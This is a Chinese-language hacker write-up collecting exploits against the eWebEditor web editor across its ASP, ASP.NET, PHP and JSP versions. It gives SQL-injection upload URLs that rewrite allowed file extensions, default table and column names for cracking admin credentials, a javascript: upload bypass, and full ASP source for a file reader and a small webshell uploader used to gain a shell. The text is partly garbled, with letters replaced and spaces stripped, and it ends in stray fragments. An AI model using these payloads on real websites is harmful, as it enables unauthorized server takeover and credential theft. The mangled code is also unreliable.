eWebeditor完全总结
eWebeditor完全总结
到这个,大家都知道这是老生长谈了。不就ewebeditor么,网上一找一大堆
我这里有些0day和e_p是网上找的。但经验与技巧却是我自己的。技术重要,思路也很重要。不说废话了。看下文!
/ewebeditor.aspid=NewsContentstyle=s_full直接这个地址,出现一堆编辑框,有远程上传,先点感叹号!查看版本!
2.1.6的直接用此e_p
/ewebeditor/upload.aspaction=savetype=IMAGEstyle=firefo_'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileE_t,S_FlashE_t,%20[S_ImageE_t]%2b'|cer',S_MediaE_t,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a"method=postname=myformenctype="multipart/form-data"> 2.1.6以前版本的用此e_p /ewebeditor/upload.aspaction=savetype=IMAGEstyle=hcocoa'unionselectS_ID,S_Name,S_Dir,S_EditorHeader,S_Body,S_Width,S_Height,S_Memo,S_IsSys,S_FileE_t,S_FlashE_t, [S_ImageE_t]%2b'|cer|asp_',S_MediaE_t,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWordfromewebeditor_stylewheres_name='standard'and'a'='a"method=postname=myform enctype="multipart/form-data"> 如果目录不充许执行脚本,要换目录,用这个e_p..../db可以自定义,不过要绝对路径! /upload.aspaction=savetype=IMAGEstyle=horind'unionselect S_ID,S_Name,S_Dir,S_CSS,[S_UploadDir]%2b'/../db',S_Width,S_Height,S_Memo,S_IsSys,S_FileE_t,S_FlashE_t, [S_ImageE_t]%2b'|asa',S_MediaE_t,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrlfrom ewebeditor_stylewheres_name='standard'and'a'='a"method=postname=myformenctype="multipart/form-data"> 2.7.0版本注入点 /path/ewebeditor/ewebeditor.aspid=article_contentstyle=full_v200 默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用nbsi进行猜解,对此进行注入取得账号密码 ewebeditor2.7.5上传漏洞:这个用在修改了可以上传asa但是提示没有工具栏的情况下,作者不明。 ewebeditor2.8.0上传漏洞:前提要开启远程上传,然后传一个webshell.jpg.asp即可,查看源代码即可获得shell地址。 这0day我从来没成功过,不知道是真还是假!不过用另一个成功过 /ewebeditor.aspid=NewsContentstyle=s_full 调用这个样式,会出现远程上传按纽,再用下面的方法远程上传! 远程上传时执行代码,导致getshell 1.把_.jpg.asp_iaoma.ASa放在同一目录下 ——————_.jpg.asp ————————————————————————————————————------------------------------------------- <%Setfs=CreateObject("Scripting.FileSystemObject")Set MyTe_tStream=fs.OpenTe_tFile(server.MapPath("\_iaoma.asp"),1,false,0)Thete_t=MyTe_tStream.ReadAllresponse.writethete_t%> ——————————————————————_.jpg.asp————————————————————----------------------------------------- ------------------------------------------------------------_iaoma.ASa----------------------------------------------------------------------------------------------- <%onerrorresumene_t%><%ofso="scripting.filesystemobject"%><%setfso=server.createobject(ofso)%><%path=request("path")%><%ifpath<>""then%><%data=request("dama")%><%set dama=fso.createte_tfile(path,true)%><%dama.writedata%><%iferr=0then%><%="success"%><%else%><%="false"%><%endif%><%err.clear%><%endif%><%dama.close%><%setdama=nothing%><%setfos=nothing%><%=" <%=server.mappath(request.servervariables("script_name"))%><%=" -------------------------------------------------------------_iaoma.ASa——————————————————————————------------------------ 2.远程上传_.jpg.asp 会自动执行脚本,上传小马! ASP_版: 受影响文件:eWebEditorNet/upload.asp_ 利用方法:添好本地的cer的Shell文件。在浏览器地址栏输入 javascript:lbtnUpload.click();就能得到shell。嘿嘿....绕过了限制......成功的上传了ASP_文件....文件默认的上传后保存的地址是 eWebEditorNet/UploadFile/现在来看看是否上传成功..... php版:给出e_p value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|as_|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> file: jsp的版本,根本没有对上传文件类型进行检测!需要注意的是jsp版本的没有上传按钮!直接选择文件,回车就可以提交了!ewebeditorasp版1.0.0上传漏洞利用程序----ByHCocoa
"%>
"%><%=""%><%="
"%><%="